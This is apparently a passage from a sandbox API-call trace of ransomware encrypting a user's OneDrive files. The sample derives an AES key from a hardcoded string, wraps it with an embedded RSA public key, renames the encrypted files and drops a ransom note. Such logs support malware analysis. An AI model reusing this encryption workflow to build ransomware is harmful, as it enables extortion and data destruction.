returned 1 [0281.838] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.838] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.849] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.849] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.849] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.849] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.849] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.849] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.849] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.850] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.850] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.850] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.850] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.850] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.850] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.850] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.850] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.850] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.850] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.850] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.850] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.850] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.850] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.851] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.851] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.851] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.851] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.851] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.851] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.851] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.851] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.851] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.851] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.851] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.851] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.851] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.851] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.851] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.852] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.852] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.852] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.852] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.852] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.852] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.852] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.852] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.852] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.852] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.852] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.852] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.852] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.852] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.853] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.853] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.853] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.853] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.853] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.853] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.853] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0281.853] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x2d0, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x2e0) returned 1 [0281.853] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x2e0, lpOverlapped=0x0) returned 1 [0281.853] CloseHandle (hObject=0x5d80) returned 1 [0281.853] CloseHandle (hObject=0x5d4c) returned 1 [0281.853] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ne-np\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ne-np\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0281.860] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0281.860] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ne-np\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0281.862] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ne-np\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ne-np\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0281.865] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0281.865] CryptDestroyKey (hKey=0x2fc248) returned 1 [0281.865] CryptReleaseContext (hProv=0x2f1ef70, dwFlags=0x0) returned 1 [0281.865] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0281.865] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0281.865] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ne-np\\readme_back_files.htm")) returned 0xffffffff [0281.866] AreFileApisANSI () returned 1 [0281.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0281.866] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ne-np\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0281.867] GetFileType (hFile=0x5d3c) returned 0x1 [0281.867] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0281.868] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0281.868] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nl\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0281.869] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0281.869] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0281.869] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0281.869] GetLastError () returned 0x0 [0281.869] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nl\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nl\\filesync.localizedresources.dll.mui")) returned 0x20 [0281.871] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nl\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0281.872] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nl\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nl\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0281.873] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nl\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nl\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d80 [0281.874] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nl\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0281.875] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f1ed50) returned 1 [0281.878] CryptCreateHash (in: hProv=0x2f1ed50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0281.878] lstrlenA (lpString="IobgRfrtGtwdLWqndRsiYwqNzMlQm") returned 29 [0281.878] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0281.878] CryptDeriveKey (in: hProv=0x2f1ed50, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fc308) returned 1 [0281.878] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0281.878] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0281.878] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1ef70) returned 1 [0281.879] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1ef70, dwCertEncodingType=0x1, pInfo=0x2f37a50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f37a80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f37a88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc248) returned 1 [0281.879] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0281.879] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1f190*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1f190*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0281.879] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f1f190*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1f190*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0281.880] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.883] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, 